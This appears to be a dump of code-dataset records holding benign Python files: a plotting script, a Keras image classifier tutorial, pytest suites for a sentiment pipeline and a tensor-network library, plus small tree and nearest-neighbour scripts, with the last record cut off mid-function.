None:\n ltickbeg = nice(cmin, 0.5)\n base = 0.5\n nb = 0\n while nb <= 10 and ltickbeg > cmin + ld:\n base = base / 10.0\n ltickbeg = nice(cmin, base)\n nb = nb + 1\n if abs(ltickbeg) < abs(cmax) and orderm(ltickbeg) + 2 < orderm(cmax):\n ltickbeg = 0.0\n else:\n ltickbeg = float(args.ltickbeg)\n if args.ltickend is None:\n ltickend = cmax\n else:\n ltickend = float(args.ltickend)\n\n # scalar\n maxtick = max(abs(ltickbeg), abs(ltickend))\n if maxtick >= 1.0e4 or maxtick <= 1.0e-3:\n scalar = int(floor(log10(maxtick)))\n cscale = pow(10, scalar)\n else:\n cscale = 1.0\n\n # set ticks\n ticks = np.arange(ltickbeg, ltickend + ld, ld)\n tbeg = max(cmin, ltickbeg)\n tend = min(cmax, ltickend)\n\n # set tick positions on colorbar\n ticks = np.asarray(\n [i for i in ticks if i >= tbeg - 1.0e-10 * abs(tbeg) and i <= tend + 1.0e-10 * abs(tend)])\n tick_labels = ['' for i in range(0, len(ticks))]\n for i in range(0, len(ticks)):\n tick_labels[i] = ('%f' % (ticks[i] / cscale)).rstrip('0').rstrip('.')\n\n # set minor ticks\n if args.lmtick != 0:\n # extend tail and head\n pticks = np.append(ticks, ticks[0] - ld)\n pticks = np.append(pticks, ticks[-1] + ld)\n # sort all major ticks\n pticks = np.sort(pticks)\n # get pseudo-location of minor ticks\n nt = len(pticks)\n mticks = []\n for i in range(0, nt - 1):\n mticks = np.append(mticks, np.linspace(pticks[i], pticks[i + 1], args.lmtick + 2))\n mticks = [i for i in mticks if (i not in pticks)]\n mticks = np.asarray(\n [i for i in mticks if i >= tbeg - 1.0e-10 * abs(tbeg) and i <= tend + 1.0e-10 * abs(tend)])\n\n if args.norm == 'log':\n\n # set colorbar major ticks\n if args.ltickbeg is None:\n ltickbeg = np.floor(cmin)\n else:\n ltickbeg = float(args.ltickbeg)\n if args.ltickend is None:\n ltickend = np.ceil(cmax)\n else:\n ltickend = float(args.ltickend)\n if args.ld is None:\n ld = max(1, round((ltickend - ltickbeg) / 5.0))\n else:\n ld = int(args.ld)\n\n ticks = np.arange(ltickbeg, ltickend + 1, ld)\n tbeg = max(cmin, ltickbeg)\n tend = min(cmax, ltickend)\n\n # set tick positions on colorbar\n ticks = np.asarray(\n [i for i in ticks if i >= tbeg - 1.0e-10 * abs(tbeg) and i <= tend + 1.0e-10 * abs(tend)])\n tick_labels = ['' for i in range(0, len(ticks))]\n for i in range(0, len(ticks)):\n tick_labels[i] = '$\\mathregular{10^{%i}}$' % (ticks[i])\n\n # colorbar minor ticks\n if args.lmtick != 0:\n # extend tail and head\n pticks = np.append(ticks, ticks[0] - ld)\n pticks = np.append(pticks, ticks[-1] + ld)\n # sort all major ticks\n pticks = np.sort(pticks)\n # get pseudo-location of minor ticks\n nt = len(pticks)\n mticks = []\n for i in range(0, nt - 1):\n mticks = np.append(mticks,\n np.log10(np.linspace(10**pticks[i], 10**pticks[i + 1], args.lmtick + 2)))\n mticks = np.asarray(\n [i for i in mticks if i >= tbeg - 1.0e-10 * abs(tbeg) and i <= tend + 1.0e-10 * abs(tend)])\n\n # add ticks by drawing lines\n if lloc == 'right':\n\n # add major ticks\n cbeg = cy[3]\n cend = cy[2]\n ticks = [(i - cmin) / (cmax - cmin) * (cend - cbeg) + cbeg for i in ticks]\n\n tx = [cx[2] for i in range(0, len(ticks))]\n ty = [i for i in ticks]\n last_tick = ty[-1]\n ticklen = float(args.tickmajorlen) * ipp\n tx2 = [i + ticklen for i in tx]\n ty2 = [i for i in ticks]\n ttx = [i + ticklen + 0.05 for i in tx]\n tty = [i for i in ticks]\n\n majortick = []\n e1 = list(zip(tx, ty))\n e2 = list(zip(tx2, ty2))\n for i in range(0, len(ticks)):\n majortick.append([e1[i], e2[i]])\n\n tick_major_width = 0.5\n majortick = LineCollection(majortick, linewidths=tick_major_width, colors='k')\n ax.add_collection(majortick)\n\n # add tick labels\n if args.norm == 'linear' and cscale != 1.0:\n tick_labels[-1] = r'$\\mathregular{\\times 10^{%i}}$' % scalar + '\\n' + tick_labels[-1]\n for i in range(0, len(ticks)):\n ax.text(ttx[i], tty[i], tick_labels[i], fontproperties=font, size=ltfs, ha='left', va='center')\n\n # add minor ticks\n if args.lmtick != 0:\n mticks = [(i - cmin) / (cmax - cmin) * (cend - cbeg) + cbeg for i in mticks]\n\n tx = [cx[2] for i in range(0, len(mticks))]\n ty = [i for i in mticks]\n ticklen = float(args.tickmajorlen) * ipp * 0.5\n tx2 = [i + ticklen for i in tx]\n ty2 = [i for i in mticks]\n ttx = [i + ticklen + 0.05 for i in tx]\n tty = [i for i in mticks]\n\n minortick = []\n e1 = list(zip(tx, ty))\n e2 = list(zip(tx2, ty2))\n for i in range(0, len(mticks)):\n minortick.append([e1[i], e2[i]])\n\n tick_minor_width = 0.5 * 0.75\n minortick = LineCollection(minortick, linewidths=tick_minor_width, colors='k')\n ax.add_collection(minortick)\n\n # set unit\n if args.unit is not None:\n if args.unitpad is None:\n upad = 0.05\n else:\n upad = float(args.unitpad)\n if args.norm == 'linear':\n maxlen = max([len(i) for i in tick_labels]) * 0.75\n if args.norm == 'log':\n maxlen = 3.5\n ux = cx[2] + ticklen * 2.0 + 0.025 + maxlen * ltfs * ipp + upad\n uy = 0.5 * (cbeg + cend)\n ct = ax.text(ux,\n uy,\n args.unit,\n size=lufs,\n fontproperties=font,\n rotation=270,\n ha='left',\n va='center')\n ct.set_size(lufs)\n\n # add ticks by drawing lines\n if lloc == 'bottom':\n\n # add major ticks\n cbeg = cx[0]\n cend = cx[1]\n ticks = [(i - cmin) / (cmax - cmin) * (cend - cbeg) + cbeg for i in ticks]\n\n ty = [cy[3] for i in range(0, len(ticks))]\n tx = [i for i in ticks]\n last_tick = tx[-1]\n ticklen = float(args.tickmajorlen) * ipp\n ty2 = [i - ticklen for i in ty]\n tx2 = [i for i in ticks]\n tty = [i - ticklen - 0.05 for i in ty]\n ttx = [i for i in ticks]\n\n majortick = []\n e1 = list(zip(tx, ty))\n e2 = list(zip(tx2, ty2))\n for i in range(0, len(ticks)):\n majortick.append([e1[i], e2[i]])\n\n tick_major_width = 0.5\n majortick = LineCollection(majortick, linewidths=tick_major_width, colors='k')\n ax.add_collection(majortick)\n\n # add tick labels\n if args.norm == 'linear' and cscale != 1.0:\n tick_labels[-1] = tick_labels[-1] + '\\n' + r'$\\mathregular{\\times 10^{%i}}$' % scalar\n for i in range(0, len(ticks)):\n ct = ax.text(ttx[i],\n tty[i],\n tick_labels[i],\n fontproperties=font,\n size=ltfs,\n ha='center',\n va='top')\n ct.set_size(ltfs)\n\n # add minor ticks\n if args.lmtick != 0:\n mticks = [(i - cmin) / (cmax - cmin) * (cend - cbeg) + cbeg for i in mticks]\n\n ty = [cy[3] for i in range(0, len(mticks))]\n tx = [i for i in mticks]\n ticklen = float(args.tickmajorlen) * ipp * 0.5\n ty2 = [i - ticklen for i in ty]\n tx2 = [i for i in mticks]\n tty = [i - ticklen - 0.05 for i in ty]\n ttx = [i for i in mticks]\n\n minortick = []\n e1 = list(zip(tx, ty))\n e2 = list(zip(tx2, ty2))\n for i in range(0, len(mticks)):\n minortick.append([e1[i], e2[i]])\n\n tick_minor_width = 0.5 * 0.75\n minortick = LineCollection(minortick, linewidths=tick_minor_width, colors='k')\n ax.add_collection(minortick)\n\n # set unit\n if args.unit is not None:\n if args.unitpad is None:\n upad = 0.05\n else:\n upad = float(args.unitpad)\n if args.norm == 'linear':\n maxlen = 1.50\n if args.norm == 'log':\n maxlen = 1.75\n ux = 0.5 * (cbeg + cend)\n uy = cy[3] - ticklen - 0.025 - maxlen * ltfs * ipp - upad\n ct = ax.text(ux, uy, args.unit, size=lufs, fontproperties=font, ha='center', va='top')\n ct.set_size(lufs)\n\n## set title\nif args.title is not None:\n\n if args.titlesize is None:\n title_font_size = max(float(args.label1size), float(args.label2size), float(args.label3size)) + 2\n else:\n title_font_size = float(args.titlesize)\n\n if args.titlex is None:\n if octant_1:\n title_x = 0.5 * (p2x + p6x)\n if octant_2:\n title_x = 0.5 * (p8x + p4x)\n else:\n title_x = float(args.titlex)\n\n if args.titley is None:\n if args.axis2loc == 'top' or args.axis2loc == 'both' or args.axis3loc == 'top' or args.axis3loc == 'both':\n title_y = p8y + 2 * max(label_2_size, label_3_size) * ipp + 0.1\n else:\n title_y = p8y + 0.25\n else:\n title_y = float(args.titley)\n\n ax.text(title_x,\n title_y,\n args.title,\n ha='center',\n fontproperties=fontbold,\n fontweight='bold',\n size=title_font_size)\n\n## set axis limits and aspect\nextra0 = 0.0\nextra1 = 0.0\n\n# x axis low limit\nif args.axis1loc == 'left' or args.axis1loc == 'both':\n extra0 = extra0 + float(args.tickmajorlen) * ipp * 1.25\n xlim0 = xlim[0] - extra0\nelse:\n xlim0 = xlim[0] - 0.05\n\n# x axis top limit\nif args.axis1loc == 'right' or args.axis1loc == 'both':\n extra1 = extra1 + float(args.tickmajorlen) * ipp * 1.25\n xlim1 = xlim[1] + extra1\nelse:\n xlim1 = xlim[1] + 0.1\n\nax.set_xlim([xlim0, xlim1])\n\nextra0 = 0.0\nextra1 = 0.0\n\n# y axis low limit\nif args.axis3loc == 'top' or args.axis3loc == 'both':\n extra0 = extra0 + float(args.tickmajorlen) * ipp * 1.25\n ylim0 = ylim[0] - extra0\nelse:\n ylim0 = ylim[0] - 0.1\n\n# y axis top limit\nif args.axis3loc == 'bottom' or args.axis3loc == 'both':\n extra1 = extra1 + float(args.tickmajorlen) * ipp * 1.25\n ylim1 = ylim[1] + extra1\nelse:\n ylim1 = ylim[1] + 0.05\n\nax.set_ylim([ylim0, ylim1])\n\n# set axis to appropritate ratio\nax.set_aspect('equal')\n\nplt.tick_params(\n axis='x', # changes apply to the x1-axis\n which='both', # both major and minor ticks are affected\n bottom=0, # ticks along the bottom axis\n top=0, # ticks along the top axis\n labelbottom=0, # labels along the bottom axis\n labeltop=0) # labels along the top axis\nplt.tick_params(\n axis='y', # changes apply to the x2-axis\n which='both', # both major and minor ticks are affected\n left=0, # ticks along the left axis\n right=0, # ticks along the right axis\n labelleft=0, # labels along the left axis\n labelright=0) # labels along the right axis\n\n## output\noutput(args)\n","sub_path":"src/showvolcon.py","file_name":"showvolcon.py","file_ext":"py","file_size_in_byte":78032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"382193014","text":"# Convolutional Neural Network\r\n\r\n# Importing the Keras libraries and Packages\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Convolution2D\r\nfrom keras.layers import MaxPooling2D\r\nfrom keras.layers import Flatten\r\nfrom keras.layers import Dense\r\n\r\n# Part 1. Building the Convolutional Neural Network (CNN)\r\n# Initialising the CNN\r\nclassifier = Sequential()\r\n\r\n# 1. Convolution\r\nclassifier.add(Convolution2D(32,3,3, input_shape=(64,64,3), activation='relu'))\r\n\r\n# 2. Pooling\r\nclassifier.add(MaxPooling2D(pool_size=(2,2)))\r\n\r\n# Adding a second CNN layer\r\nclassifier.add(Convolution2D(32,3,3, activation='relu'))\r\nclassifier.add(MaxPooling2D(pool_size=(2,2)))\r\n\r\n# 3. Flattening\r\nclassifier.add(Flatten())\r\n\r\n# 4. Full Connection\r\nclassifier.add(Dense(units=128, activation='relu'))\r\nclassifier.add(Dense(units=1, activation='sigmoid'))\r\n\r\n\r\n# Compiling the CNN\r\nclassifier.compile(optimizer='adam', loss='binary_crossentropy', metrics='accuracy')\r\n\r\n\r\n# Part 2. Fitting the CNN to the images\r\n\r\n\r\nfrom keras_preprocessing.image import ImageDataGenerator\r\n\r\n\r\ntrain_datagen = ImageDataGenerator(\r\n rescale=1./255,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True)\r\n\r\n\r\ntest_datagen = ImageDataGenerator(rescale=1./255)\r\n\r\ntraining_set = train_datagen.flow_from_directory('dataset/training_set',\r\n target_size=(64, 64),\r\n batch_size=32,\r\n class_mode='binary')\r\n\r\ntest_set = test_datagen.flow_from_directory('dataset/test_set',\r\n target_size=(64,64),\r\n batch_size=32,\r\n class_mode='binary')\r\n\r\nclassifier.fit(training_set,\r\n steps_per_epoch=8000/32,\r\n epochs=50,\r\n validation_data=test_set,\r\n validation_steps=2000/32)\r\n\r\n\r\n# Part 3. Making new predictions\r\n\r\nimport numpy as np\r\nfrom keras.preprocessing import image\r\n\r\ntest_image1 = image.load_img('single_prediction/cat_or_dog_1.jpg', target_size=(64,64))\r\ntest_image1 = image.img_to_array(test_image1)\r\ntest_image1 = np.expand_dims(test_image1, axis=0)\r\n\r\nresult1 = classifier.predict(test_image1)\r\ndog_cat1 = training_set.class_indices\r\n\r\nif result1[0][0] >0.5:\r\n prediction1 = 'Dog'\r\nelse:\r\n prediction1 = 'Cat'\r\n \r\n\r\ntest_image2 = image.load_img('single_prediction/cat_or_dog_1.jpg', target_size=(64,64))\r\ntest_image2 = image.img_to_array(test_image2)\r\ntest_image2 = np.expand_dims(test_image2, axis=0)\r\n\r\nresult2 = classifier.predict(test_image2)\r\ndog_cat2 = training_set.class_indices\r\n\r\nif result1[0][0] ==1:\r\n prediction2 = 'Dog'\r\nelse:\r\n prediction2 = 'Cat'\r\n \r\n\r\n \r\n \r\n \r\n\r\n\r\n","sub_path":"cnn/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"574275743","text":"import pytest\nimport numpy as np\nimport transformers\nimport tensorflow as tf\n\nfrom aspect_based_sentiment_analysis import (\n BertABSClassifier,\n BertABSCConfig,\n BertPipeline,\n Sentiment,\n Example,\n load_examples\n)\nfrom aspect_based_sentiment_analysis.probing import (\n AttentionGradientProduct\n)\nnp.random.seed(1)\ntf.random.set_seed(1)\n\n\n@pytest.fixture\ndef nlp() -> BertPipeline:\n # Here, we do more integration like tests rather than\n # mocked unit tests. We show up how the pipeline works,\n # and it's why we use this well-defined pipeline fixture.\n name = 'absa/classifier-rest-0.1'\n tokenizer = transformers.BertTokenizer.from_pretrained(name)\n # We pass a config explicitly (however, it can be downloaded automatically)\n config = BertABSCConfig.from_pretrained(name)\n model = BertABSClassifier.from_pretrained(name, config=config)\n nlp = BertPipeline(model, tokenizer)\n return nlp\n\n\ndef test_integration(nlp: BertPipeline):\n text = (\"We are great fans of Slack, but we wish the subscriptions \"\n \"were more accessible to small startups.\")\n slack, price = nlp(text, aspects=['slack', 'price'])\n assert slack.sentiment == Sentiment.positive\n assert price.sentiment == Sentiment.negative\n\n\ndef test_preprocess(nlp: BertPipeline):\n # We split a document into spans (in this case, into sentences).\n nlp.text_splitter = lambda text: text.split('\\n')\n raw_document = (\"This is the test sentence 1.\\n\"\n \"This is the test sentence 2.\\n\"\n \"This is the test sentence 3.\")\n task = nlp.preprocess(\n text=raw_document,\n aspects=['aspect_1', 'aspect_2']\n )\n assert len(task.subtasks) == 2\n assert list(task.subtasks) == ['aspect_1', 'aspect_2']\n assert len(task.batch) == 6\n assert task.indices == [(0, 3), (3, 6)]\n subtask_1, subtask_2 = task\n assert subtask_1.text == subtask_2.text == raw_document\n assert subtask_1.aspect == 'aspect_1'\n assert len(subtask_1.examples) == 3\n\n\ndef test_encode(nlp: BertPipeline):\n text_1 = (\"We are great fans of Slack, but we wish the subscriptions \"\n \"were more accessible to small startups.\")\n text_2 = \"We are great fans of Slack\"\n aspect = \"Slack\"\n\n examples = [Example(text_1, aspect), Example(text_2, aspect)]\n tokenized_examples = nlp.tokenize(examples)\n input_batch = nlp.encode(tokenized_examples)\n assert isinstance(input_batch.token_ids, tf.Tensor)\n # 101 the CLS token, 102 the SEP tokens.\n token_ids = input_batch.token_ids.numpy()\n values = [101, 2057, 2024, 2307, 4599, 1997, 19840, 102, 19840, 102]\n assert token_ids[1, :10].tolist() == values\n assert token_ids[0, :7].tolist() == values[:7]\n # The second sequence should be padded (shorter),\n # and attention mask should be set.\n assert np.allclose(token_ids[1, 10:], 0)\n attention_mask = input_batch.attention_mask.numpy()\n assert np.allclose(attention_mask[1, 10:], 0)\n # Check how the tokenizer marked the segments.\n token_type_ids = input_batch.token_type_ids.numpy()\n assert token_type_ids[0, -2:].tolist() == [1, 1]\n assert np.allclose(token_type_ids[0, :-2], 0)\n\n\ndef test_predict(nlp: BertPipeline):\n text_1 = (\"We are great fans of Slack, but we wish the subscriptions \"\n \"were more accessible to small startups.\")\n text_2 = \"We are great fans of Slack\"\n aspect = \"Slack\"\n examples = [Example(text_1, aspect), Example(text_2, aspect)]\n tokenized_examples = nlp.tokenize(examples)\n input_batch = nlp.encode(tokenized_examples)\n output_batch = nlp.predict(input_batch)\n assert output_batch.scores.shape == [2, 3]\n assert output_batch.hidden_states.shape == [2, 13, 25, 768]\n assert output_batch.attentions.shape == [2, 12, 12, 25, 25]\n assert output_batch.attention_grads.shape == [2, 12, 12, 25, 25]\n scores = output_batch.scores.numpy()\n assert np.argmax(scores, axis=-1).tolist() == [2, 2]\n\n\ndef test_label(nlp: BertPipeline):\n # We add the pattern recognizer to the pipeline.\n pattern_recognizer = AttentionGradientProduct()\n nlp.pattern_recognizer = pattern_recognizer\n\n text_1 = (\"We are great fans of Slack, but we wish the subscriptions \"\n \"were more accessible to small startups.\")\n text_2 = \"The Slack often has bugs.\"\n text_3 = \"best of all is the warm vibe\"\n aspect = \"slack\"\n examples = [Example(text_1, aspect),\n Example(text_2, aspect),\n Example(text_3, aspect)]\n\n tokenized_examples = nlp.tokenize(examples)\n input_batch = nlp.encode(tokenized_examples)\n output_batch = nlp.predict(input_batch)\n labeled_examples = nlp.label(tokenized_examples, output_batch)\n labeled_examples = list(labeled_examples)\n labeled_1, labeled_2, labeled_3 = labeled_examples\n assert labeled_1.sentiment == Sentiment.positive\n assert labeled_2.sentiment == Sentiment.negative\n assert isinstance(labeled_1.scores, list)\n assert np.argmax(labeled_1.aspect_representation.look_at) == 5\n assert np.argmax(labeled_2.aspect_representation.look_at) == 1\n\n # We need to calibrate the model. The prediction should be neutral.\n # In fact, the model does not recognize the aspect correctly.\n assert labeled_3.sentiment == Sentiment.positive\n assert np.allclose(labeled_3.aspect_representation.look_at,\n [1.0, 0.16, 0.50, 0.54, 0.34, 0.39, 0.12], atol=0.01)\n\n\ndef test_evaluate(nlp: BertPipeline):\n examples = load_examples(\n dataset='semeval',\n domain='restaurant',\n test=True\n )\n metric = tf.metrics.Accuracy()\n result = nlp.evaluate(examples[:10], metric, batch_size=10)\n result = result.numpy()\n # The model predicts the first 10 labels perfectly.\n assert result == 1\n result = nlp.evaluate(examples[10:20], metric, batch_size=10)\n assert np.isclose(result, 0.95)\n\n\ndef test_get_completed_task(nlp: BertPipeline):\n text = (\"We are great fans of Slack.\\n\"\n \"The Slack often has bugs.\\n\"\n \"best of all is the warm vibe\")\n # Make sure we have defined a text_splitter, even naive.\n nlp.text_splitter = lambda text: text.split('\\n')\n\n task = nlp.preprocess(text, aspects=['slack', 'price'])\n tokenized_examples = task.batch\n input_batch = nlp.encode(tokenized_examples)\n output_batch = nlp.predict(input_batch)\n aspect_span_labeled = nlp.label(tokenized_examples, output_batch)\n\n completed_task = nlp.get_completed_task(task, aspect_span_labeled)\n assert len(completed_task.batch) == 6\n assert completed_task.indices == [(0, 3), (3, 6)]\n\n slack, price = completed_task\n assert slack.text == price.text == text\n # The sentiment among fragments are different. We normalize scores.\n assert np.allclose(slack.scores, [0.06, 0.46, 0.48], atol=0.01)\n # Please note once gain that there is a problem\n # with the neutral sentiment, model is over-fitted.\n assert np.allclose(price.scores, [0.06, 0.42, 0.52], atol=0.01)\n","sub_path":"tests/core/test_pipeline.py","file_name":"test_pipeline.py","file_ext":"py","file_size_in_byte":7044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"548527310","text":"import random\n\ntree = [\n None,\n [\n None,\n None\n ],\n [\n None,\n 12,\n [\n None,\n 2,\n None\n ],\n None\n ],\n [\n None\n ]\n]\n\nt1 = [\n None,\n [\n None,\n None,\n [\n None,\n None\n ]\n ]\n]\n\nt2 = [\n None,\n [\n None,\n None\n ]\n]\n\ndef is_list(list):\n try:\n len(list)\n except TypeError:\n return False\n return True\n\ndef deeps(tree, lvl = ''):\n if not is_list(tree):\n return 0\n if not len(tree):\n return 0\n lvl += '.'\n for node in tree:\n print(lvl)\n deeps(node, lvl)\n \n\ndef assign(tree, leafs = [i for i in range(100)]):\n for i in range(len(tree) -1, -1, -1):\n if not is_list(tree[i]):\n if not len(leafs):\n return\n if not tree[i]:\n tree[i] = leafs.pop()\n\n else:\n assign(tree[i], leafs)\n\n\ndef draw_tree(tree, lvl = 0):\n if not is_list(tree) or not len(tree):\n s = ''\n for i in range(lvl):\n s += '┊\\t'\n return s + str(tree) + '\\n'\n lvl += 1\n s = ''\n for i in range(lvl-1):\n s += '┊\\t'\n s += '╭ ' + random.choice(['+','-','*','/','^','sin']) + '\\n'\n for node in tree:\n s += draw_tree(node, lvl)\n return s\n\n \n\nassign(t1)\nassign(t2)\nmeans = [t2, t1]\nassign(tree, means)\nprint(draw_tree(tree))","sub_path":"python_tasks/calculator/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"155768151","text":"## NEAREST-NEIGHBOR ALGORITHM\n\nfrom math import sqrt\nimport numpy as np\n\ntrain= open (\"cndd.txt\",\"r\")\ntest=open (\"test.txt\",\"r\")\ncor=0\nwor=0\nind=-1\ntrg=[]\ntrl=[]\ntsg=[]\ntsl=[]\nhtr=0\nhts=0\nw=3\ndist=[]\n\nfor line in train :\n x1,x2,x3,x4,x5=line.split(',')\n trg+=([x1,x2,x3,x4])\n trl+=[x5]\n htr+=1\nfor line in test :\n y1,y2,y3,y4,y5=line.split(',')\n tsg+=([y1,y2,y3,y4])\n tsl+=[y5]\n hts+=1\n \ntrg=np.array(trg,dtype=np.float64)\ntsg=np.array(tsg,dtype=np.float64)\n\nfor x in range(0,len(tsg),4):\n mindist=100\n dist=[]\n for y in range(0,len(trg),4):\n #print(tsg[x],tsg[x+1],tsg[x+2],tsg[x+3])\n #print(trg[y],trg[y+1],trg[y+2],trg[y+3])\n dst=(((tsg[x]-trg[y])**2)+((tsg[x+1]-trg[y+1])**2)+((tsg[x+2]-trg[y+2])**2)+((tsg[x+3]-trg[y+3])**2))\n dst=sqrt( dst)\n dist+=[dst]\n ##print(dst)\n ##print()\n print(\"********************\")\n for i in range(len(dist)):\n if mindist>dist[i]:\n mindist=dist[i]\n ind=i\n print(\"mindist=\",mindist,\"\\nindex=\",ind)\n inde=int(x/4)\n if tsl[inde]==trl[ind]:\n print (\"Correct\")\n print(inde,ind)\n cor+=1\n else:\n print(\"Wrong\")\n print(inde,ind)\n wor+=1\n print (\"--------------------\")\n print()\n \nprint()\nprint(\"Number of training patterns =\",htr)\nprint(\"Number of test patterns =\",hts)\nprint(\"Correctly classified =\",cor)\nprint(\"Incorrectly classified =\",wor)\nn=len(tsl)\nca=(cor/n)*100\nprint(\"Correct Accuracy=\",ca)","sub_path":"nearestNeighbor.py","file_name":"nearestNeighbor.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"248136387","text":"import numpy as np\nimport tensorflow as tf\nimport pytest\nfrom collections import namedtuple\nfrom tensornetwork.network_components import Node, Edge\nimport tensornetwork\n\nSingleNodeEdgeTensor = namedtuple('SingleNodeEdgeTensor', 'node edge tensor')\nDoubleNodeEdgeTensor = namedtuple('DoubleNodeEdgeTensor',\n 'node1 node2 edge1 edge12 tensor')\n\n\n@pytest.fixture(name='single_node_edge')\ndef fixture_single_node_edge(backend):\n net = tensornetwork.TensorNetwork(backend=backend)\n tensor = np.ones((1, 2, 2))\n tensor = net.backend.convert_to_tensor(tensor)\n node = Node(\n tensor=tensor, name=\"test_node\", axis_names=[\"a\", \"b\", \"c\"], network=net)\n edge = Edge(name=\"edge\", node1=node, axis1=0)\n return SingleNodeEdgeTensor(node, edge, tensor)\n\n\n@pytest.fixture(name='double_node_edge')\ndef fixture_double_node_edge(backend):\n net = tensornetwork.TensorNetwork(backend=backend)\n tensor = net.backend.convert_to_tensor(np.ones((1, 2, 2)))\n node1 = Node(\n tensor=tensor, name=\"test_node1\", axis_names=[\"a\", \"b\", \"c\"], network=net)\n node2 = Node(\n tensor=tensor, name=\"test_node2\", axis_names=[\"a\", \"b\", \"c\"], network=net)\n net.connect(node1[\"b\"], node2[\"b\"])\n edge1 = Edge(name=\"edge\", node1=node1, axis1=0)\n edge12 = Edge(name=\"edge\", node1=node1, axis1=1, node2=node2, axis2=1)\n return DoubleNodeEdgeTensor(node1, node2, edge1, edge12, tensor)\n\n\ndef test_node_initialize_numpy():\n net = tensornetwork.TensorNetwork(backend=\"numpy\")\n tensor = np.ones((1, 2, 3))\n node = Node(\n tensor=tensor, name=\"test_node\", axis_names=[\"a\", \"b\", \"c\"], network=net)\n np.testing.assert_allclose(node.tensor, tensor)\n assert node.name == 'test_node'\n assert node.network == net\n assert len(node.edges) == 3\n assert isinstance(node.edges[0], Edge)\n assert node.axis_names == [\"a\", \"b\", \"c\"]\n assert node.signature == -1\n\n\ndef test_node_initialize_tensorflow():\n net = tensornetwork.TensorNetwork(backend=\"tensorflow\")\n tensor = tf.ones((1, 2, 3))\n node = Node(\n tensor=tensor, name=\"test_node\", axis_names=[\"a\", \"b\", \"c\"], network=net)\n np.testing.assert_allclose(node.tensor, np.ones((1, 2, 3)))\n assert node.name == 'test_node'\n assert node.network == net\n assert len(node.edges) == 3\n assert isinstance(node.edges[0], Edge)\n assert node.axis_names == [\"a\", \"b\", \"c\"]\n assert node.signature == -1\n\n\ndef test_node_get_rank(single_node_edge):\n node = single_node_edge.node\n assert node.get_rank() == 3\n\n\ndef test_node_set_signature(single_node_edge):\n node = single_node_edge.node\n node.set_signature(2)\n assert node.signature == 2\n\n\ndef test_node_add_axis_names_raises_error_duplicate_names(single_node_edge):\n node = single_node_edge.node\n with pytest.raises(ValueError):\n node.add_axis_names([\"A\", \"B\", \"A\"])\n\n\ndef test_node_add_axis_names_raises_error_wrong_length(single_node_edge):\n node = single_node_edge.node\n with pytest.raises(ValueError):\n node.add_axis_names([\"A\", \"B\"])\n\n\ndef test_node_add_axis_names(single_node_edge):\n node = single_node_edge.node\n node.add_axis_names([\"A\", \"B\", \"C\"])\n assert node.axis_names == [\"A\", \"B\", \"C\"]\n\n\ndef test_node_add_edge_raises_error_mismatch_rank(single_node_edge):\n node = single_node_edge.node\n edge = single_node_edge.edge\n with pytest.raises(ValueError):\n node.add_edge(edge, axis=-1)\n edge = Edge(name=\"edge\", node1=node, axis1=0)\n with pytest.raises(ValueError):\n node.add_edge(edge, axis=3)\n\n\ndef test_node_add_edge_raises_error_override(double_node_edge):\n node1 = double_node_edge.node1\n edge = double_node_edge.edge1\n with pytest.raises(ValueError):\n node1.add_edge(edge, axis=1)\n\n\ndef test_node_add_edge(single_node_edge):\n node = single_node_edge.node\n edge = single_node_edge.edge\n node.add_edge(edge, axis=0)\n assert node.edges[0] == edge\n\n\ndef test_node_get_tensor(single_node_edge):\n node = single_node_edge.node\n tensor = single_node_edge.tensor\n np.testing.assert_allclose(node.get_tensor(), tensor)\n\n\ndef test_node_set_tensor(single_node_edge):\n node = single_node_edge.node\n tensor2 = np.zeros((2, 4, 3, 2))\n node.set_tensor((tensor2))\n np.testing.assert_allclose(node.get_tensor(), tensor2)\n\n\ndef test_node_shape(single_node_edge):\n node = single_node_edge.node\n assert node.shape == (1, 2, 2)\n\n\ndef test_node_get_axis_number(single_node_edge):\n node = single_node_edge.node\n assert node.get_axis_number(1) == 1\n assert node.get_axis_number(\"b\") == 1\n\n\ndef test_node_get_axis_number_raises_error_unknown(single_node_edge):\n node = single_node_edge.node\n with pytest.raises(ValueError):\n node.get_axis_number(\"d\")\n\n\ndef test_node_get_dimension(single_node_edge):\n node = single_node_edge.node\n assert node.get_dimension(1) == 2\n assert node.get_dimension(\"b\") == 2\n\n\ndef test_node_get_dimension_raises_error_mismatch_rank(single_node_edge):\n node = single_node_edge.node\n with pytest.raises(ValueError):\n node.get_dimension(-1)\n with pytest.raises(ValueError):\n node.get_dimension(3)\n\n\ndef test_node_get_edge(single_node_edge):\n node = single_node_edge.node\n edge = single_node_edge.edge\n node.add_edge(edge, axis=0)\n assert node.get_edge(0) == edge\n\n\ndef test_node_get_all_edges(single_node_edge):\n node = single_node_edge.node\n edge = single_node_edge.edge\n node.add_edge(edge, axis=0)\n assert len(node.get_all_edges()) == 3\n assert node.get_all_edges()[0] == edge\n\n\ndef test_node_get_all_nondangling(double_node_edge):\n node1 = double_node_edge.node1\n assert node1.get_all_nondangling() == {node1.get_all_edges()[1]}\n\n\ndef test_node_set_name(single_node_edge):\n node = single_node_edge.node\n node.set_name(\"new_name\")\n assert node.name == \"new_name\"\n\n\ndef test_node_has_nondangling_edge_false(single_node_edge):\n node = single_node_edge.node\n assert not node.has_nondangling_edge()\n\n\ndef test_node_has_nondangling_edge_true(double_node_edge):\n node1 = double_node_edge.node1\n assert node1.has_nondangling_edge()\n\n\ndef test_node_magic_getitem(single_node_edge):\n node = single_node_edge.node\n edge = single_node_edge.edge\n node.add_edge(edge, axis=0)\n assert node[0] == edge\n\n\ndef test_node_magic_str(single_node_edge):\n node = single_node_edge.node\n assert str(node) == node.name\n\n\ndef test_node_magic_lt(double_node_edge):\n node1 = double_node_edge.node1\n node2 = double_node_edge.node2\n assert (node1 < node2) == (id(node1) < id(node2))\n\n\ndef 